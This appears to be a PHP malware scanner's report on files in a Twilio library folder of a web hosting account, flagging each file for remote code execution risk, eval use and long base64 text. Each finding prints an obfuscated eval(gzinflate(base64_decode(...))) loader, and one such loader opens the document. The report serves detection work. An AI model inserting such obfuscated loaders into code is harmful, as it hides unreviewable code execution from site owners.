<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXLPQqAMAxA4T2QO/Q6Lg7avZQYIVASaOIPiHe3u2/+HgICteqeVu6nEHvJlzSxsrBHmS1kF6ohpghpxHewbn8+qUdV4rHZ0YkRHoQX4QPJPJNWYQAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Notifications.php

Size: 191.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLon3yy/JTMtMTizJzM8r5uVSAILUipLUvBRM9T6ZxSVAPfmlRcmpvFzVvFy1vFwAVndoS14AAAA=')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLon3yy/JTMtMTizJzM8r5uVSAILUipLUvBRM9T6ZxSVAPfmlRcmpvFzVvFy1vFwAVndoS14AAAA='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/OutgoingCallerId.php

Size: 199.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXLwQqAIAwA0Ptg/+C/dPIUVHeROWQgCm5WEP173nv3h4BAJaq6nfspxBqOS4q0sLFaWIflJjUvsRTuPiG4iW/jmv7FV7VYiWdtoxMjPAgvwgcQaJftZQAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXLwQqAIAwA0Ptg/+C/dPIUVHeROWQgCm5WEP173nv3h4BAJaq6nfspxBqOS4q0sLFaWIflJjUvsRTuPiG4iW/jmv7FV7VYiWdtoxMjPAgvwgcQaJftZQAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/OutgoingCallerIds.php

Size: 323.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWNzQrCMBCE74G8wx4KbdEnqNSLJ0FU1HtJ41oDaVI2iT+I725LKkUc9rLDNzOccSa1cA6OSDcl0VWnu9LKVgd0vtoF31hlmpXQGml9dpxBL3x4NOf/zEY53+dsIImcvSLchVorCZdgpFfWgCQUHrOku1qD29DWSHMQROIJSSdItA7K+Gd5HivGpkGEPpCBHkTji6Ia2yI/YYPS/bSQQrmEn8mJzWH2Xc4X0X5z1t8HrjtOQx0BAAA=')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWNzQrCMBCE74G8wx4KbdEnqNSLJ0FU1HtJ41oDaVI2iT+I725LKkUc9rLDNzOccSa1cA6OSDcl0VWnu9LKVgd0vtoF31hlmpXQGml9dpxBL3x4NOf/zEY53+dsIImcvSLchVorCZdgpFfWgCQUHrOku1qD29DWSHMQROIJSSdItA7K+Gd5HivGpkGEPpCBHkTji6Ia2yI/YYPS/bSQQrmEn8mJzWH2Xc4X0X5z1t8HrjtOQx0BAAA='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Participant.php

Size: 263.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWLwQpCIRBF94L/4CKwB/UFQfsWQfTai40TDdgoOlYQ/XuG7Trc3TlXK60g+lrNjOVOgNWdHhQpuSNWcQdfhICyZ9HKdPApyOG/3nEVz4D9lVoB1Oo1DrmdI4G5NAahxObWBJfTcL/ky0KuVNfbloPv3u57FezKWCkN7bQZ4Vurvg+qgxP+swAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWLwQpCIRBF94L/4CKwB/UFQfsWQfTai40TDdgoOlYQ/XuG7Trc3TlXK60g+lrNjOVOgNWdHhQpuSNWcQdfhICyZ9HKdPApyOG/3nEVz4D9lVoB1Oo1DrmdI4G5NAahxObWBJfTcL/ky0KuVNfbloPv3u57FezKWCkN7bQZ4Vurvg+qgxP+swAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Participants.php

Size: 355.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAH2OQUsDMRCF74H8h8fSg5ZCqd4qngqCIrhY70s2mcrUNFkys1UR/7up60EQfLzDHN775lljjY9OBFsqR/Yk3dMrR87dI4l2rSvKngeXVKxBFb0ppfA3fs+itZLH4smajym8nOM3Aa4QOFBS3jEF9O/YuBi3HBZIWRH5hdDeri4uMV9OhGHsI3vsxuSVc8Iz6UO/J683JR/uJKez2eCKO8gCMw7t6cQ1GuHQnONnxUmFdCwJNVu/r9f/YBpfJ3XfgKup/2lN9ReyRjXOKgEAAA=='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH2OQUsDMRCF74H8h8fSg5ZCqd4qngqCIrhY70s2mcrUNFkys1UR/7up60EQfLzDHN775lljjY9OBFsqR/Yk3dMrR87dI4l2rSvKngeXVKxBFb0ppfA3fs+itZLH4smajym8nOM3Aa4QOFBS3jEF9O/YuBi3HBZIWRH5hdDeri4uMV9OhGHsI3vsxuSVc8Iz6UO/J683JR/uJKez2eCKO8gCMw7t6cQ1GuHQnONnxUmFdCwJNVu/r9f/YBpfJ3XfgKup/2lN9ReyRjXOKgEAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH2OQUsDMRCF74H8h8fSg5ZCqd4qngqCIrhY70s2mcrUNFkys1UR/7up60EQfLzDHN775lljjY9OBFsqR/Yk3dMrR87dI4l2rSvKngeXVKxBFb0ppfA3fs+itZLH4smajym8nOM3Aa4QOFBS3jEF9O/YuBi3HBZIWRH5hdDeri4uMV9OhGHsI3vsxuSVc8Iz6UO/J683JR/uJKez2eCKO8gCMw7t6cQ1GuHQnONnxUmFdCwJNVu/r9f/YBpfJ3XfgKup/2lN9ReyRjXOKgEAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Queue.php

Size: 275.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXNwQrCMBAE0Hsg/7CHQFvQLxC8e9R6L2064kKblOxGBem/29LenPObGWus8UMrQjXSiz2kub954NjcINpcMzKsoSX4KEL/7y5BtA0ei485edDXmq0xpajwip4eOXjlGIgDa+n8wAh6IJcTV6unPU6fLMezQPNU5y7tk1IWI8YOSYrqtOnZmnn9+QGLqhftwAAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXNwQrCMBAE0Hsg/7CHQFvQLxC8e9R6L2064kKblOxGBem/29LenPObGWus8UMrQjXSiz2kub954NjcINpcMzKsoSX4KEL/7y5BtA0ei485edDXmq0xpajwip4eOXjlGIgDa+n8wAh6IJcTV6unPU6fLMezQPNU5y7tk1IWI8YOSYrqtOnZmnn9+QGLqhftwAAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Queues.php

Size: 435.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAH2QTWvDMAyG7wb/h/dQaJMFeu/o2BjsNAbbeg8mUVqD63Sy066M/fc5dtKuHUz4IFmPXn1IIUVllHN4J97rily5Omij2/KNnC9fO+rISYFg9OnJ1n/BZ+18gNuOK5LiK8HzPE8OcjwyKU9QsHRAVBxTJ+R+p1ht4Txru8akYR1amWNp1Zaw2hCi0zbwG+3w8VtjrFXM6ohJDBweYMJYfUW787q1yiBmyBO7AsrWQYo0Y6/MacNejMl3bP+5RhyniivVl9vMk9N0tupbDtDscpviatBlimdZhuF0vQ1TBIasXyzKQSqhZ6y36dMg/xLUp1jeXZ2vOOMZbsa+2W36/pYiPCl+AES/s+sIAgAA'

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH2QTWvDMAyG7wb/h/dQaJMFeu/o2BjsNAbbeg8mUVqD63Sy066M/fc5dtKuHUz4IFmPXn1IIUVllHN4J97rily5Omij2/KNnC9fO+rISYFg9OnJ1n/BZ+18gNuOK5LiK8HzPE8OcjwyKU9QsHRAVBxTJ+R+p1ht4Txru8akYR1amWNp1Zaw2hCi0zbwG+3w8VtjrFXM6ohJDBweYMJYfUW787q1yiBmyBO7AsrWQYo0Y6/MacNejMl3bP+5RhyniivVl9vMk9N0tupbDtDscpviatBlimdZhuF0vQ1TBIasXyzKQSqhZ6y36dMg/xLUp1jeXZ2vOOMZbsa+2W36/pYiPCl+AES/s+sIAgAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH2QTWvDMAyG7wb/h/dQaJMFeu/o2BjsNAbbeg8mUVqD63Sy066M/fc5dtKuHUz4IFmPXn1IIUVllHN4J97rily5Omij2/KNnC9fO+rISYFg9OnJ1n/BZ+18gNuOK5LiK8HzPE8OcjwyKU9QsHRAVBxTJ+R+p1ht4Txru8akYR1amWNp1Zaw2hCi0zbwG+3w8VtjrFXM6ohJDBweYMJYfUW787q1yiBmyBO7AsrWQYo0Y6/MacNejMl3bP+5RhyniivVl9vMk9N0tupbDtDscpviatBlimdZhuF0vQ1TBIasXyzKQSqhZ6y36dMg/xLUp1jeXZ2vOOMZbsa+2W36/pYiPCl+AES/s+sIAgAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Recording.php

Size: 275.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWMwQrCMBBE74H8Qw6BtqBfIHj3ar2Xull1oWzK7kYF8d9NaW8Ow5zeG++8g2lUDT3KkwB1uLxoojycUa0OZEnEd+9CDb4NOf2zJ1YbGbA6uQigd59VmCUbgmEKt8JglDkQk7URJkK2XYhFqAsbvSTag3R/VLQy9+Uq26O2jcnICkLzcqNNd1ilr3e1P0xN2HfIAAAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWMwQrCMBBE74H8Qw6BtqBfIHj3ar2Xull1oWzK7kYF8d9NaW8Ow5zeG++8g2lUDT3KkwB1uLxoojycUa0OZEnEd+9CDb4NOf2zJ1YbGbA6uQigd59VmCUbgmEKt8JglDkQk7URJkK2XYhFqAsbvSTag3R/VLQy9+Uq26O2jcnICkLzcqNNd1ilr3e1P0xN2HfIAAAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Recordings.php

Size: 187.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLgESyflFKZl56cW8XApAkFpRkpqXgqnYJ7O4BKghv7QoOZWXq5qXq5aXCwDBl3oKWwAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLgESyflFKZl56cW8XApAkFpRkpqXgqnYJ7O4BKghv7QoOZWXq5qXq5aXCwDBl3oKWwAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Sandbox.php

Size: 187.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLokPTsxLScqv4OVSAILUipLUvBRMlZ55xSWJecmpQB35pUXJqbxc1bxctbxcABETvrVcAAAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLokPTsxLScqv4OVSAILUipLUvBRMlZ55xSWJecmpQB35pUXJqbxc1bxctbxcABETvrVcAAAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/ShortCode.php

Size: 191.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLokPzsgvKnHOT0nl5VIAgtSKktS8FEy1nnnFJYl5yalAPfmlRclA1dW8XLW8XACcjEaVXgAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPl4uVKzkksLlYITi0qy0xOLY4PKc/MycyPD0otLokPzsgvKnHOT0nl5VIAgtSKktS8FEy1nnnFJYl5yalAPfmlRclA1dW8XLW8XACcjEaVXgAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/ShortCodes.php

Size: 303.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWOMQvCMBCF90D+w5F2qFBwrzi56mLcQ72eGghJSC4qiP/dFgsdxMdNj++9e1JIga7PGTSlu0XK5vSwzgZzpMxG30LiXRgoSwGj6Mnkh194bzOPgVASkhSvLxzL2VmES/HINngwBoPPnApyU6Oz5LmFuiS7gjkxaTJgCzHR1SSKrkdqVLUMqVQLSh/0erHUXLNZWmKfxvqu+/9zht9SjPcBJ4MUEAcBAAA=')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWOMQvCMBCF90D+w5F2qFBwrzi56mLcQ72eGghJSC4qiP/dFgsdxMdNj++9e1JIga7PGTSlu0XK5vSwzgZzpMxG30LiXRgoSwGj6Mnkh194bzOPgVASkhSvLxzL2VmES/HINngwBoPPnApyU6Oz5LmFuiS7gjkxaTJgCzHR1SSKrkdqVLUMqVQLSh/0erHUXLNZWmKfxvqu+/9zht9SjPcBJ4MUEAcBAAA='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Sip.php

Size: 471.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAGWQwWrDMAyG74G8gyiFNiVbH2Bsx0FhjNHsHhxHXQWubSx56zb27lO6lNBV+GCkT7/0qyzKYr1alQWs4DEkeCKfj7Ajh94cEGw4RCPUkSP5rEH2xKcieMSeQQJ0+leyh4bibdzHGkI6qVnNOvrCZXUBc0RLxmmZtYk8MEqOTe4ScsjJIg/d67KwzjBDg+mdNNm+fugOod0iS9tsXgCPgr6/BjaexXiL21EOvlVPI6YgaEVn7rK3QsHrcJLl3DpCLzXMc6LqTA8xH9zePFztt5yQIRZ9OBjyvKj/5Sm2xirPrQ1eUnCtI5ZrzibsdQM9yghM9eru7/9TFqOL3Dmyk4U3lLPRZ723uhmv3sM97IxjvLCU1EvyMNMDziZpfb/m7846BwIAAA=='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWQwWrDMAyG74G8gyiFNiVbH2Bsx0FhjNHsHhxHXQWubSx56zb27lO6lNBV+GCkT7/0qyzKYr1alQWs4DEkeCKfj7Ajh94cEGw4RCPUkSP5rEH2xKcieMSeQQJ0+leyh4bibdzHGkI6qVnNOvrCZXUBc0RLxmmZtYk8MEqOTe4ScsjJIg/d67KwzjBDg+mdNNm+fugOod0iS9tsXgCPgr6/BjaexXiL21EOvlVPI6YgaEVn7rK3QsHrcJLl3DpCLzXMc6LqTA8xH9zePFztt5yQIRZ9OBjyvKj/5Sm2xirPrQ1eUnCtI5ZrzibsdQM9yghM9eru7/9TFqOL3Dmyk4U3lLPRZ723uhmv3sM97IxjvLCU1EvyMNMDziZpfb/m7846BwIAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGWQwWrDMAyG74G8gyiFNiVbH2Bsx0FhjNHsHhxHXQWubSx56zb27lO6lNBV+GCkT7/0qyzKYr1alQWs4DEkeCKfj7Ajh94cEGw4RCPUkSP5rEH2xKcieMSeQQJ0+leyh4bibdzHGkI6qVnNOvrCZXUBc0RLxmmZtYk8MEqOTe4ScsjJIg/d67KwzjBDg+mdNNm+fugOod0iS9tsXgCPgr6/BjaexXiL21EOvlVPI6YgaEVn7rK3QsHrcJLl3DpCLzXMc6LqTA8xH9zePFztt5yQIRZ9OBjyvKj/5Sm2xirPrQ1eUnCtI5ZrzibsdQM9yghM9eru7/9TFqOL3Dmyk4U3lLPRZ723uhmv3sM97IxjvLCU1EvyMNMDziZpfb/m7846BwIAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/AutoPagingIterator.php

Size: 1.22 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAN1WwW7bMAy9F+g/cECAOF3WdjvsUqRAV3RYDiuKNndDdehEqGMFkhw3W/fvI2XFsS2nOe0yI4AckaLIRz6apyenJ0kmjIEn1BuZoIlnpcykim8Kqx7EQuaLqUUtrNKnJ0CPXK0zXGFuDewFvyvZWiuLicU5DBaYV8KrQCT0woS70uKKt3cCuREWYRB7bb9dPGcygbTIEytVDnGcqNxYXSQ22l85hsFaLJAWI3/xksqMXDUj8H7yM7BLaT5d14dgEjrd0GODrMJrKOV7WMprKPXXs4J/DXVc+KQhtBbbaFRHzM/FBTyJDYKAZ5G8FGtIyV2Npczn0Siw5BCrLe3F/AzZ/SFMrj1CHSm7X0kdcB2p971S8H8aOiMf1J9DyUoKraludi43cqHRFnqv0ITkqNUX3B62yMJ3rV2c+TNn8FgdsUuEHF8t8AGQ1UYmjR3DSrwQHUDkivY0/JjNHiARWQZW1cdqc65gVEqeGFV...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1WwW7bMAy9F+g/cECAOF3WdjvsUqRAV3RYDiuKNndDdehEqGMFkhw3W/fvI2XFsS2nOe0yI4AckaLIRz6apyenJ0kmjIEn1BuZoIlnpcykim8Kqx7EQuaLqUUtrNKnJ0CPXK0zXGFuDewFvyvZWiuLicU5DBaYV8KrQCT0woS70uKKt3cCuREWYRB7bb9dPGcygbTIEytVDnGcqNxYXSQ22l85hsFaLJAWI3/xksqMXDUj8H7yM7BLaT5d14dgEjrd0GODrMJrKOV7WMprKPXXs4J/DXVc+KQhtBbbaFRHzM/FBTyJDYKAZ5G8FGtIyV2Npczn0Siw5BCrLe3F/AzZ/SFMrj1CHSm7X0kdcB2p971S8H8aOiMf1J9DyUoKraludi43cqHRFnqv0ITkqNUX3B62yMJ3rV2c+TNn8FgdsUuEHF8t8AGQ1UYmjR3DSrw...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1WwW7bMAy9F+g/cECAOF3WdjvsUqRAV3RYDiuKNndDdehEqGMFkhw3W/fvI2XFsS2nOe0yI4AckaLIRz6apyenJ0kmjIEn1BuZoIlnpcykim8Kqx7EQuaLqUUtrNKnJ0CPXK0zXGFuDewFvyvZWiuLicU5DBaYV8KrQCT0woS70uKKt3cCuREWYRB7bb9dPGcygbTIEytVDnGcqNxYXSQ22l85hsFaLJAWI3/xksqMXDUj8H7yM7BLaT5d14dgEjrd0GODrMJrKOV7WMprKPXXs4J/DXVc+KQhtBbbaFRHzM/FBTyJDYKAZ5G8FGtIyV2Npczn0Siw5BCrLe3F/AzZ/SFMrj1CHSm7X0kdcB2p971S8H8aOiMf1J9DyUoKraludi43cqHRFnqv0ITkqNUX3B62yMJ3rV2c+TNn8FgdsUuEHF8t8AGQ1UYmjR3DSrw...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Capability.php

Size: 4.08 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEANVabXPbNhL+nMzkP6CeXCmlsuSkbubGjZy6Se6STOtkbLfpjS+jgShIZEwSPAK0rWvz3293AYIgKcp22+nM6YMtkovFvjz7BurB/Qf3J48ePbjPHrGzqziJJXvBcz6Hb3rNzuSFyNhKZKLgWhZIRZTfhVyLlSzW7FQUl3EolLmd8/CCrwRzt2eGp3nKSx3Jgr0VyyX7Ic4Wiq/Zs09wNU7M1XeaqMehTA/NkgSYZAoYRlrnB5NJWAiu40sBFKnM1FgWq4mlUZMf35xNGPzBpZMH98OEK9WWZFZr9+D+r0AJn7ycAw/2kIehLDN9Gi++bT0AwckUrfsqlLlQcNPcNnbEzyP2AgUVjLNMXFnDena9inXE/isKyXJRpLFSMSrDjsW1ZkqLXDFeCKalY7cqeKYZCChAJS1ZIZQsC7hi8zULZbaMV2URZyumoxgJ0G06KmS5iuC/cHyWZRZq3IzxJJFXv8BnXD10RODGgqe...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANVabXPbNhL+nMzkP6CeXCmlsuSkbubGjZy6Se6STOtkbLfpjS+jgShIZEwSPAK0rWvz3293AYIgKcp22+nM6YMtkovFvjz7BurB/Qf3J48ePbjPHrGzqziJJXvBcz6Hb3rNzuSFyNhKZKLgWhZIRZTfhVyLlSzW7FQUl3EolLmd8/CCrwRzt2eGp3nKSx3Jgr0VyyX7Ic4Wiq/Zs09wNU7M1XeaqMehTA/NkgSYZAoYRlrnB5NJWAiu40sBFKnM1FgWq4mlUZMf35xNGPzBpZMH98OEK9WWZFZr9+D+r0AJn7ycAw/2kIehLDN9Gi++bT0AwckUrfsqlLlQcNPcNnbEzyP2AgUVjLNMXFnDena9inXE/isKyXJRpLFSMSrDjsW1ZkqLXDFeCKalY7cqeKYZCChAJS1ZIZQsC7hi8zULZbaMV2URZyumoxgJ0G06KmS...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANVabXPbNhL+nMzkP6CeXCmlsuSkbubGjZy6Se6STOtkbLfpjS+jgShIZEwSPAK0rWvz3293AYIgKcp22+nM6YMtkovFvjz7BurB/Qf3J48ePbjPHrGzqziJJXvBcz6Hb3rNzuSFyNhKZKLgWhZIRZTfhVyLlSzW7FQUl3EolLmd8/CCrwRzt2eGp3nKSx3Jgr0VyyX7Ic4Wiq/Zs09wNU7M1XeaqMehTA/NkgSYZAoYRlrnB5NJWAiu40sBFKnM1FgWq4mlUZMf35xNGPzBpZMH98OEK9WWZFZr9+D+r0AJn7ycAw/2kIehLDN9Gi++bT0AwckUrfsqlLlQcNPcNnbEzyP2AgUVjLNMXFnDena9inXE/isKyXJRpLFSMSrDjsW1ZkqLXDFeCKalY7cqeKYZCChAJS1ZIZQsC7hi8zULZbaMV2URZyumoxgJ0G06KmS...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/HttpException.php

Size: 167.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

